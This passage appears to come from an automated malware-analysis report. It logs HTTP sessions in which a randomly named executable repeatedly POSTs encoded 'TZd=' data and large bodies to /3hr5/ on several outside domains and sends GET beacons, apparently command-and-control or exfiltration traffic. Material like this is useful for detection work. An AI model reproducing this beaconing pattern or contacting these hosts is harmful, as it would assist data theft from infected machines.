Data Ascii: TZd=n3/fLoA/IJWnif5gdhBCICs0RwFqNeVmKp0W8uNVx4H8diDiRTfKIOiyiSzg9iZdUFS19L0ut2awRJDhDu2SgqeMU+TlzlII7dgZLou0VNyIUYyq2y3yib1gAcqhAaD0O/2lY4Pd/ecg09L1bI/LyM6/62mie+LY1CxF4waI8GGDT7zMGQ==
Dec 4, 2023 15:25:02.763046980 CET | 353 | IN | HTTP/1.1 405 Not Allowed
date: Mon, 04 Dec 2023 14:25:02 GMT
content-type: text/html
content-length: 154
server: NginX
connection: close
Data Ascii: <html><head><title>405 Not Allowed</title></head><body><center><h1>405 Not Allowed</h1></center><hr><center>openresty</center></body></html>


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
38 | 192.168.11.20 | 50169 | 91.195.240.19 | 80 | 8076 | C:\Program Files (x86)\xBtEEHVveuQicIceYFyfhlDfihQuJpZjmMFRvDFoPTfQADjsKirsjstcrRvOzQVZoOfOU\czazZqNSMxullu.exe

Timestamp | Bytes transferred | Direction | Data
Dec 4, 2023 15:25:05.275269032 CET | 1150 | OUT | POST /3hr5/ HTTP/1.1
Host: www.neuvillette.org
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate, br
Accept-Language: en-US,en;q=0.9
Origin: http://www.neuvillette.org
Referer: http://www.neuvillette.org/3hr5/
Connection: close
Content-Length: 524
Cache-Control: no-cache
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10) AppleWebKit/600.1.25 (KHTML, like Gecko) QuickLook/5.0
Dec 4, 2023 15:25:05.459450960 CET | 353 | IN | HTTP/1.1 405 Not Allowed
                                                                                                                              date: Mon, 04 Dec 2023 14:25:05 GMT
                                                                                                                              content-type: text/html
                                                                                                                              content-length: 154
                                                                                                                              server: NginX
                                                                                                                              connection: close
                                                                                                                              Data Ascii: <html><head><title>405 Not Allowed</title></head><body><center><h1>405 Not Allowed</h1></center><hr><center>openresty</center></body></html>


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
39 | 192.168.11.20 | 50170 | 91.195.240.19 | 80 | 8076 | C:\Program Files (x86)\xBtEEHVveuQicIceYFyfhlDfihQuJpZjmMFRvDFoPTfQADjsKirsjstcrRvOzQVZoOfOU\czazZqNSMxullu.exe
Timestamp | Bytes transferred | Direction | Data
Dec 4, 2023 15:25:07.979127884 CET | 2626 | OUT | POST /3hr5/ HTTP/1.1
                                                                                                                              Host: www.neuvillette.org
                                                                                                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                                                              Accept-Encoding: gzip, deflate, br
                                                                                                                              Accept-Language: en-US,en;q=0.9
                                                                                                                              Origin: http://www.neuvillette.org
                                                                                                                              Referer: http://www.neuvillette.org/3hr5/
                                                                                                                              Connection: close
                                                                                                                              Content-Length: 52912
                                                                                                                              Cache-Control: no-cache
                                                                                                                              Content-Type: application/x-www-form-urlencoded
                                                                                                                              User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10) AppleWebKit/600.1.25 (KHTML, like Gecko) QuickLook/5.0
Dec 4, 2023 15:25:08.161313057 CET | 353 | IN | HTTP/1.1 405 Not Allowed
                                                                                                                              date: Mon, 04 Dec 2023 14:25:08 GMT
                                                                                                                              content-type: text/html
                                                                                                                              content-length: 154
                                                                                                                              server: NginX
                                                                                                                              connection: close
                                                                                                                              Data Ascii: <html><head><title>405 Not Allowed</title></head><body><center><h1>405 Not Allowed</h1></center><hr><center>openresty</center></body></html>


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
40 | 192.168.11.20 | 50171 | 91.195.240.19 | 80 | 8076 | C:\Program Files (x86)\xBtEEHVveuQicIceYFyfhlDfihQuJpZjmMFRvDFoPTfQADjsKirsjstcrRvOzQVZoOfOU\czazZqNSMxullu.exe
Timestamp | Bytes transferred | Direction | Data
Dec 4, 2023 15:25:10.679915905 CET | 533 | OUT | GET /3hr5/?TZd=q1X/IYN8eKewuN13aiQWFCouSmM7D+QNK5N6gfBg5YPvN3u/YjmPX9Swyhyhl1JXW1KA5roj8jCGf76SGeGao+TTCbXI7mNU4g==&1dr=yP5PQD38 HTTP/1.1
                                                                                                                              Host: www.neuvillette.org
                                                                                                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                                                              Accept-Language: en-US,en;q=0.9
                                                                                                                              Connection: close
                                                                                                                              User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10) AppleWebKit/600.1.25 (KHTML, like Gecko) QuickLook/5.0
Dec 4, 2023 15:25:10.949726105 CET | 1340 | IN | HTTP/1.1 200 OK
                                                                                                                              date: Mon, 04 Dec 2023 14:25:10 GMT
                                                                                                                              content-type: text/html; charset=UTF-8
                                                                                                                              transfer-encoding: chunked
                                                                                                                              vary: Accept-Encoding
                                                                                                                              x-powered-by: PHP/8.1.17
                                                                                                                              expires: Mon, 26 Jul 1997 05:00:00 GMT
                                                                                                                              cache-control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
                                                                                                                              pragma: no-cache
                                                                                                                              x-adblock-key: MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBANnylWw2vLY4hUn9w06zQKbhKBfvjFUCsdFlb6TdQhxb9RXWXuI4t31c+o8fYOv/s8q1LGPga3DE1L/tHU4LENMCAwEAAQ==_JSwnIoAPI+nigEU4hZlSpVfVxcW1nwN0pzihfecIeI7m9UQhmwPhFV145Fk0WrHPl9IwErlGuqKPGF/96bRysg==
                                                                                                                              last-modified: Mon, 04 Dec 2023 14:25:10 GMT
                                                                                                                              x-cache-miss-from: parking-698fb476bf-mbx66
                                                                                                                              server: NginX
                                                                                                                              connection: close
                                                                                                                              Data Ascii: 2CE<!DOCTYPE html><html lang="en" data-adblockkey=MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBANnylWw2vLY4hUn9w06zQKbhKBfvjFUCsdFlb6TdQhxb9RXWXuI4t31c+o8fYOv/s8q1LGPga3DE1L/tHU4LENMCAwEAAQ==_JSwnIoAPI+nigEU4hZlSpVfVxcW1nwN0pzihfecIeI7m9UQhmwPhFV145Fk0WrHPl9IwErlGuqKPGF/96bRysg==><head><meta charset="utf-8"><title>neuvillette.org&nbsp;-&nbsp;neuvillette Resources and Information.</title><meta name="viewport" content="width=device-width,initial-scale=1.0,maximum-scale=1.0,user-scalable=0"><meta name="description" content="neuvillette.org is your first and best source for all of the information youre looking for. From
                                                                                                                              Dec 4, 2023 15:25:10.949829102 CET1340INData Raw: 67 65 6e 65 72 61 6c 20 74 6f 70 69 63 73 20 74 6f 20 6d 6f 72 65 20 6f 66 20 77 68 61 74 20 79 6f 75 20 77 6f 75 6c 64 20 65 78 70 65 63 74 20 74 6f 20 66 69 6e 64 20 68 65 72 65 2c 20 6e 65 75 76 69 6c 6c 65 74 74 65 2e 6f 72 67 20 68 61 73 20
                                                                                                                              Data Ascii: general topics to more of what you would expect to find here, neuvillette.org has it all. We hope you find1062 what you are searching for!"><link rel="icon" type="image/png" href="//img.sedoparking.com/templates/log
                                                                                                                              Data Ascii: er-content--twot .container-content__right{background-position-y:top}.container-content--wa .container-content__left{background-position-y:top}.container-content--wa .container-content__right{background-position-y:top}.two-tier-ads-list{paddin
                                                                                                                              Dec 4, 2023 15:25:10.950436115 CET1340INData Raw: 6d 65 6e 74 7b 77 6f 72 64 2d 77 72 61 70 3a 62 72 65 61 6b 2d 77 6f 72 64 3b 6c 69 73 74 2d 73 74 79 6c 65 3a 6e 6f 6e 65 7d 2e 77 65 62 61 72 63 68 69 76 65 2d 62 6c 6f 63 6b 5f 5f 6c 69 73 74 2d 65 6c 65 6d 65 6e 74 2d 6c 69 6e 6b 7b 6c 69 6e
                                                                                                                              Data Ascii: ment{word-wrap:break-word;list-style:none}.webarchive-block__list-element-link{line-height:30px;font-size:20px;color:#9fd801}.webarchive-block__list-element-link:link,.webarchive-block__list-element-link:visited{text-decoration:none}.webarchiv
                                                                                                                              Dec 4, 2023 15:25:11.132544041 CET1340INData Raw: 51 3d 3d 5f 4a 53 77 6e 49 6f 41 50 49 2b 6e 69 67 45 55 34 68 5a 6c 53 70 56 66 56 78 63 57 31 6e 77 4e 30 70 7a 69 68 66 65 63 49 65 49 37 6d 39 55 51 68 6d 77 50 68 46 56 31 34 35 46 6b 30 57 72 48 50 6c 39 49 77 45 72 6c 47 75 71 4b 50 47 46
                                                                                                                              Data Ascii: Q==_JSwnIoAPI+nigEU4hZlSpVfVxcW1nwN0pzihfecIeI7m9UQhmwPhFV145Fk0WrHPl9IwErlGuqKPGF/96bRysg==","tid":3199,"buybox":false,"buyboxTopic":true,"disclaimer":true,"imprint":false,"searchbox":true,"noFollow":false,"slsh":false,"ppsh":true,"dnhlsh":tr


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
41 | 192.168.11.20 | 50172 | 172.67.202.151 | 80 | 8076 | C:\Program Files (x86)\xBtEEHVveuQicIceYFyfhlDfihQuJpZjmMFRvDFoPTfQADjsKirsjstcrRvOzQVZoOfOU\czazZqNSMxullu.exe
Timestamp | Bytes transferred | Direction | Data
Dec 4, 2023 15:25:16.414796114 CET | 807 | OUT | POST /3hr5/ HTTP/1.1
                                                                                                                              Host: www.scoopstarz.com
                                                                                                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                                                              Accept-Encoding: gzip, deflate, br
                                                                                                                              Accept-Language: en-US,en;q=0.9
                                                                                                                              Origin: http://www.scoopstarz.com
                                                                                                                              Referer: http://www.scoopstarz.com/3hr5/
                                                                                                                              Connection: close
                                                                                                                              Content-Length: 184
                                                                                                                              Cache-Control: no-cache
                                                                                                                              Content-Type: application/x-www-form-urlencoded
                                                                                                                              User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10) AppleWebKit/600.1.25 (KHTML, like Gecko) QuickLook/5.0
                                                                                                                              Data Ascii: TZd=NrQzB75bAHDtk5Gvmy8KmLDwXRj4enxeUydC8lpsS6JkkrvZBCM+A8OfEFD2A5c3CBudF4sGsoHthUlz0b1KOwGFJyE9D7jo7q5NtTp1DR7IHfGm4EewTlM1C6g0zgEwM7QpPeGqcF3NoaKzJvZAaFXe7dQ8rUav362FVsx54Liz0yJWjA==
Dec 4, 2023 15:25:16.662198067 CET | 588 | IN | HTTP/1.1 404 Not Found
                                                                                                                              Date: Mon, 04 Dec 2023 14:25:16 GMT
                                                                                                                              Content-Length: 0
                                                                                                                              Connection: close
                                                                                                                              CF-Cache-Status: DYNAMIC
                                                                                                                              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=yaMdYCaxsyZm%2BnnAGn6wfAMsDFbhqsAoKuIfYOfyEWAXxjIdIanL7Ywvo9cGfgjdZgEr83rPGSWI85aZJRtn65zhEdNCeb0nvbdLts3ZwWMGSR2YnJopP7VySZC3m%2BohyXX1hc0%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                              Server: cloudflare
                                                                                                                              CF-RAY: 8304b7bdec98184d-EWR
                                                                                                                              alt-svc: h3=":443"; ma=86400


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
42 | 192.168.11.20 | 50173 | 172.67.202.151 | 80 | 8076 | C:\Program Files (x86)\xBtEEHVveuQicIceYFyfhlDfihQuJpZjmMFRvDFoPTfQADjsKirsjstcrRvOzQVZoOfOU\czazZqNSMxullu.exe
Timestamp | Bytes transferred | Direction | Data
Dec 4, 2023 15:25:19.028644085 CET | 1147 | OUT | POST /3hr5/ HTTP/1.1
                                                                                                                              Host: www.scoopstarz.com
                                                                                                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                                                              Accept-Encoding: gzip, deflate, br
                                                                                                                              Accept-Language: en-US,en;q=0.9
                                                                                                                              Origin: http://www.scoopstarz.com
                                                                                                                              Referer: http://www.scoopstarz.com/3hr5/
                                                                                                                              Connection: close
                                                                                                                              Content-Length: 524
                                                                                                                              Cache-Control: no-cache
                                                                                                                              Content-Type: application/x-www-form-urlencoded
                                                                                                                              User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10) AppleWebKit/600.1.25 (KHTML, like Gecko) QuickLook/5.0
Dec 4, 2023 15:25:19.274487972 CET | 586 | IN | HTTP/1.1 404 Not Found
                                                                                                                              Date: Mon, 04 Dec 2023 14:25:19 GMT
                                                                                                                              Content-Length: 0
                                                                                                                              Connection: close
                                                                                                                              CF-Cache-Status: DYNAMIC
                                                                                                                              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=5d6r45Ffvzt9P8HWlmwvEiooOeXO0Bmjl4dolBIJ1nQ7XIw80U37rp1DCtzwQqm3U7DjQ656seVmLtR2zuQPdCoaaOUXtgajPNbONyNKRpdzHV10aNp3yCmmSdbNeh9%2BdNARF3M%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                              Server: cloudflare
                                                                                                                              CF-RAY: 8304b7ce4cfc0f5d-EWR
                                                                                                                              alt-svc: h3=":443"; ma=86400


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
43 | 192.168.11.20 | 50174 | 172.67.202.151 | 80 | 8076 | C:\Program Files (x86)\xBtEEHVveuQicIceYFyfhlDfihQuJpZjmMFRvDFoPTfQADjsKirsjstcrRvOzQVZoOfOU\czazZqNSMxullu.exe
Timestamp | Bytes transferred | Direction | Data
Dec 4, 2023 15:25:21.653796911 CET | 12914 | OUT | POST /3hr5/ HTTP/1.1
                                                                                                                              Host: www.scoopstarz.com
                                                                                                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                                                              Accept-Encoding: gzip, deflate, br
                                                                                                                              Accept-Language: en-US,en;q=0.9
                                                                                                                              Origin: http://www.scoopstarz.com
                                                                                                                              Referer: http://www.scoopstarz.com/3hr5/
                                                                                                                              Connection: close
                                                                                                                              Content-Length: 52912
                                                                                                                              Cache-Control: no-cache
                                                                                                                              Content-Type: application/x-www-form-urlencoded
                                                                                                                              User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10) AppleWebKit/600.1.25 (KHTML, like Gecko) QuickLook/5.0
Dec 4, 2023 15:25:22.158212900 CET | 588 | IN | HTTP/1.1 404 Not Found
                                                                                                                              Date: Mon, 04 Dec 2023 14:25:22 GMT
                                                                                                                              Content-Length: 0
                                                                                                                              Connection: close
                                                                                                                              CF-Cache-Status: DYNAMIC
                                                                                                                              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=4owVqgp4XXDIlLhwBxX3ocWU05AF%2FfcjPOtOwS9OAYll5T8jVYxdDqhsb7E29wVxuEpnx17a1DS4CU6aPHAHzl1mEiTzSumNtG5fJ%2FcXvcAW215vAMWJxckblqA2fhich1sMFGU%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                              Server: cloudflare
                                                                                                                              CF-RAY: 8304b7dea89d443e-EWR
                                                                                                                              alt-svc: h3=":443"; ma=86400


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
44 | 192.168.11.20 | 50175 | 172.67.202.151 | 80 | 8076 | C:\Program Files (x86)\xBtEEHVveuQicIceYFyfhlDfihQuJpZjmMFRvDFoPTfQADjsKirsjstcrRvOzQVZoOfOU\czazZqNSMxullu.exe
Timestamp | Bytes transferred | Direction | Data
Dec 4, 2023 15:25:24.279675961 CET | 532 | OUT | GET /3hr5/?TZd=Ap4TCNxJOGTwjJSJsQdbrLTufwm/fHI6SBhQgXxPQrxr/rPwO1BNXP+VLlfTCp45O178MqQRyNXbll1g47V3CH2eQGoyL5qC3A==&1dr=yP5PQD38 HTTP/1.1
                                                                                                                              Host: www.scoopstarz.com
                                                                                                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                                                              Accept-Language: en-US,en;q=0.9
                                                                                                                              Connection: close
                                                                                                                              User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10) AppleWebKit/600.1.25 (KHTML, like Gecko) QuickLook/5.0
Dec 4, 2023 15:25:24.525379896 CET | 596 | IN | HTTP/1.1 404 Not Found
                                                                                                                              Date: Mon, 04 Dec 2023 14:25:24 GMT
                                                                                                                              Content-Length: 0
                                                                                                                              Connection: close
                                                                                                                              CF-Cache-Status: DYNAMIC
                                                                                                                              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=z%2FJ6TUxCea8%2BkhOSeci%2B8ljZDO2SEyta3VRoXa6V21cu82KDheHdgFDGwY%2BuNoejpA%2BwCgiWnjHzdDaCV%2BP5USI1O26Rb6HxI3vg7UMSQN9WNipGkjLrI1dYcMMquAe8lUWDcvk%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                              Server: cloudflare
                                                                                                                              CF-RAY: 8304b7ef1db74390-EWR
                                                                                                                              alt-svc: h3=":443"; ma=86400


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
45 | 192.168.11.20 | 50176 | 91.195.240.19 | 80 | 8076 | C:\Program Files (x86)\xBtEEHVveuQicIceYFyfhlDfihQuJpZjmMFRvDFoPTfQADjsKirsjstcrRvOzQVZoOfOU\czazZqNSMxullu.exe
Timestamp | Bytes transferred | Direction | Data
Dec 4, 2023 15:25:29.947700977 CET | 819 | OUT | POST /3hr5/ HTTP/1.1
                                                                                                                              Host: www.vaultedjewelry.com
                                                                                                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                                                              Accept-Encoding: gzip, deflate, br
                                                                                                                              Accept-Language: en-US,en;q=0.9
                                                                                                                              Origin: http://www.vaultedjewelry.com
                                                                                                                              Referer: http://www.vaultedjewelry.com/3hr5/
                                                                                                                              Connection: close
                                                                                                                              Content-Length: 184
                                                                                                                              Cache-Control: no-cache
                                                                                                                              Content-Type: application/x-www-form-urlencoded
                                                                                                                              User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10) AppleWebKit/600.1.25 (KHTML, like Gecko) QuickLook/5.0
                                                                                                                              Data Ascii: TZd=JgLEhuSq4P9SNwx/IVMcUBWOUfzIJUswkRacotQnSMeH1tow0KOgSGhkJ9IdWAcP1ijRDRSxXBGEyh598ZaiYI1SyZ9hH71oalcM4mpD2j89wKuvqL2jVuUDJymDG4SsNne3P//QMgMg84EoQDIW3TZMFfUcvrC2sKnQ9h7pFi+u2W+vCA==
Dec 4, 2023 15:25:30.130614042 CET | 353 | IN | HTTP/1.1 405 Not Allowed
                                                                                                                              date: Mon, 04 Dec 2023 14:25:30 GMT
                                                                                                                              content-type: text/html
                                                                                                                              content-length: 154
                                                                                                                              server: NginX
                                                                                                                              connection: close
                                                                                                                              Data Ascii: <html><head><title>405 Not Allowed</title></head><body><center><h1>405 Not Allowed</h1></center><hr><center>openresty</center></body></html>


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
46 | 192.168.11.20 | 50177 | 91.195.240.19 | 80 | 8076 | C:\Program Files (x86)\xBtEEHVveuQicIceYFyfhlDfihQuJpZjmMFRvDFoPTfQADjsKirsjstcrRvOzQVZoOfOU\czazZqNSMxullu.exe
Timestamp | Bytes transferred | Direction | Data
Dec 4, 2023 15:25:32.660418987 CET | 1159 | OUT | POST /3hr5/ HTTP/1.1
                                                                                                                              Host: www.vaultedjewelry.com
                                                                                                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                                                              Accept-Encoding: gzip, deflate, br
                                                                                                                              Accept-Language: en-US,en;q=0.9
                                                                                                                              Origin: http://www.vaultedjewelry.com
                                                                                                                              Referer: http://www.vaultedjewelry.com/3hr5/
                                                                                                                              Connection: close
                                                                                                                              Content-Length: 524
                                                                                                                              Cache-Control: no-cache
                                                                                                                              Content-Type: application/x-www-form-urlencoded
                                                                                                                              User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10) AppleWebKit/600.1.25 (KHTML, like Gecko) QuickLook/5.0
Dec 4, 2023 15:25:32.843151093 CET | 353 | IN | HTTP/1.1 405 Not Allowed
                                                                                                                              date: Mon, 04 Dec 2023 14:25:32 GMT
                                                                                                                              content-type: text/html
                                                                                                                              content-length: 154
                                                                                                                              server: NginX
                                                                                                                              connection: close
                                                                                                                              Data Ascii: <html><head><title>405 Not Allowed</title></head><body><center><h1>405 Not Allowed</h1></center><hr><center>openresty</center></body></html>


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
47 | 192.168.11.20 | 50178 | 91.195.240.19 | 80 | 8076 | C:\Program Files (x86)\xBtEEHVveuQicIceYFyfhlDfihQuJpZjmMFRvDFoPTfQADjsKirsjstcrRvOzQVZoOfOU\czazZqNSMxullu.exe
Timestamp | Bytes transferred | Direction | Data
Dec 4, 2023 15:25:35.363706112 CET | 2626 | OUT | POST /3hr5/ HTTP/1.1
                                                                                                                              Host: www.vaultedjewelry.com
                                                                                                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                                                              Accept-Encoding: gzip, deflate, br
                                                                                                                              Accept-Language: en-US,en;q=0.9
                                                                                                                              Origin: http://www.vaultedjewelry.com
                                                                                                                              Referer: http://www.vaultedjewelry.com/3hr5/
                                                                                                                              Connection: close
                                                                                                                              Content-Length: 52912
                                                                                                                              Cache-Control: no-cache
                                                                                                                              Content-Type: application/x-www-form-urlencoded
                                                                                                                              User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10) AppleWebKit/600.1.25 (KHTML, like Gecko) QuickLook/5.0
Dec 4, 2023 15:25:35.546066046 CET | 353 | IN | HTTP/1.1 405 Not Allowed
                                                                                                                              date: Mon, 04 Dec 2023 14:25:35 GMT
                                                                                                                              content-type: text/html
                                                                                                                              content-length: 154
                                                                                                                              server: NginX
                                                                                                                              connection: close
                                                                                                                              Data Ascii: <html><head><title>405 Not Allowed</title></head><body><center><h1>405 Not Allowed</h1></center><hr><center>openresty</center></body></html>


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
48 | 192.168.11.20 | 50179 | 91.195.240.19 | 80 | 8076 | C:\Program Files (x86)\xBtEEHVveuQicIceYFyfhlDfihQuJpZjmMFRvDFoPTfQADjsKirsjstcrRvOzQVZoOfOU\czazZqNSMxullu.exe
Timestamp | Bytes transferred | Direction | Data
Dec 4, 2023 15:25:38.065289021 CET | 536 | OUT | GET /3hr5/?TZd=EijkiYqzwZN1BhBpIykWY0SibsexD2BbsSiB3fZdeNuUj8Ukz47SSRBmN8cMCE5z6SXuPEOXWwW1mi1FwYWeXvEwrZlQEKUUXQ==&1dr=yP5PQD38 HTTP/1.1
                                                                                                                              Host: www.vaultedjewelry.com
                                                                                                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                                                              Accept-Language: en-US,en;q=0.9
                                                                                                                              Connection: close
                                                                                                                              User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10) AppleWebKit/600.1.25 (KHTML, like Gecko) QuickLook/5.0
Dec 4, 2023 15:25:38.315094948 CET | 1340 | IN | HTTP/1.1 200 OK
                                                                                                                              date: Mon, 04 Dec 2023 14:25:38 GMT
                                                                                                                              content-type: text/html; charset=UTF-8
                                                                                                                              transfer-encoding: chunked
                                                                                                                              vary: Accept-Encoding
                                                                                                                              x-powered-by: PHP/8.1.17
                                                                                                                              expires: Mon, 26 Jul 1997 05:00:00 GMT
                                                                                                                              cache-control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
                                                                                                                              pragma: no-cache
                                                                                                                              x-adblock-key: MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBANnylWw2vLY4hUn9w06zQKbhKBfvjFUCsdFlb6TdQhxb9RXWXuI4t31c+o8fYOv/s8q1LGPga3DE1L/tHU4LENMCAwEAAQ==_WWvH1T+Y38GcikqyYC/KDWF3YUKcosaCnpyAi1TrmGkDOufDBQTAi48nTmGiNFpIEfK+rhW907u5apLYyPiomQ==
                                                                                                                              last-modified: Mon, 04 Dec 2023 14:25:38 GMT
                                                                                                                              x-cache-miss-from: parking-698fb476bf-cmbck
                                                                                                                              server: NginX
                                                                                                                              connection: close


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
49 | 192.168.11.20 | 50180 | 76.76.21.142 | 80 | 8076 | C:\Program Files (x86)\xBtEEHVveuQicIceYFyfhlDfihQuJpZjmMFRvDFoPTfQADjsKirsjstcrRvOzQVZoOfOU\czazZqNSMxullu.exe
Timestamp | Bytes transferred | Direction | Data
Dec 4, 2023 15:25:43.704528093 CET | 795 | OUT | POST /3hr5/ HTTP/1.1
                                                                                                                              Host: www.brls.money
                                                                                                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                                                              Accept-Encoding: gzip, deflate, br
                                                                                                                              Accept-Language: en-US,en;q=0.9
                                                                                                                              Origin: http://www.brls.money
                                                                                                                              Referer: http://www.brls.money/3hr5/
                                                                                                                              Connection: close
                                                                                                                              Content-Length: 184
                                                                                                                              Cache-Control: no-cache
                                                                                                                              Content-Type: application/x-www-form-urlencoded
                                                                                                                              User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10) AppleWebKit/600.1.25 (KHTML, like Gecko) QuickLook/5.0
Dec 4, 2023 15:25:43.813873053 CET | 87 | IN | HTTP/1.0 308 Permanent Redirect
Dec 4, 2023 15:25:43.813963890 CET | 68 | IN | Data Ascii: Content-Type:
Dec 4, 2023 15:25:43.814032078 CET | 66 | IN | Data Ascii: text/plain
Dec 4, 2023 15:25:43.814075947 CET | 64 | IN | Data Ascii: Location:
Dec 4, 2023 15:25:43.814116001 CET | 84 | IN | Data Ascii: https://www.brls.money/3hr5/
Dec 4, 2023 15:25:43.814156055 CET | 61 | IN | Data Ascii: Refresh
Dec 4, 2023 15:25:43.814198971 CET | 124 | IN | Data Ascii: : 0;url=https://www.brls.money/3hr5/
server: Vercel

Redirecting...


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
50 | 192.168.11.20 | 50181 | 76.76.21.142 | 80 | 8076 | C:\Program Files (x86)\xBtEEHVveuQicIceYFyfhlDfihQuJpZjmMFRvDFoPTfQADjsKirsjstcrRvOzQVZoOfOU\czazZqNSMxullu.exe
Timestamp | Bytes transferred | Direction | Data
Dec 4, 2023 15:25:46.319391012 CET | 1135 | OUT | POST /3hr5/ HTTP/1.1
                                                                                                                              Host: www.brls.money
                                                                                                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                                                              Accept-Encoding: gzip, deflate, br
                                                                                                                              Accept-Language: en-US,en;q=0.9
                                                                                                                              Origin: http://www.brls.money
                                                                                                                              Referer: http://www.brls.money/3hr5/
                                                                                                                              Connection: close
                                                                                                                              Content-Length: 524
                                                                                                                              Cache-Control: no-cache
                                                                                                                              Content-Type: application/x-www-form-urlencoded
                                                                                                                              User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10) AppleWebKit/600.1.25 (KHTML, like Gecko) QuickLook/5.0
Dec 4, 2023 15:25:46.426790953 CET | 87 | IN | HTTP/1.0 308 Permanent Redirect
Dec 4, 2023 15:25:46.426857948 CET | 68 | IN | Data Ascii: Content-Type:
Dec 4, 2023 15:25:46.426902056 CET | 66 | IN | Data Ascii: text/plain
Dec 4, 2023 15:25:46.426942110 CET | 64 | IN | Data Ascii: Location:
Dec 4, 2023 15:25:46.426980972 CET | 84 | IN | Data Ascii: https://www.brls.money/3hr5/
Dec 4, 2023 15:25:46.427020073 CET | 61 | IN | Data Ascii: Refresh
Dec 4, 2023 15:25:46.427062035 CET | 124 | IN | Data Ascii: : 0;url=https://www.brls.money/3hr5/
server: Vercel

Redirecting...


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
51 | 192.168.11.20 | 50182 | 76.76.21.142 | 80 | 8076 | C:\Program Files (x86)\xBtEEHVveuQicIceYFyfhlDfihQuJpZjmMFRvDFoPTfQADjsKirsjstcrRvOzQVZoOfOU\czazZqNSMxullu.exe
Timestamp | Bytes transferred | Direction | Data
Dec 4, 2023 15:25:48.944977999 CET | 10342 | OUT | POST /3hr5/ HTTP/1.1
                                                                                                                              Host: www.brls.money
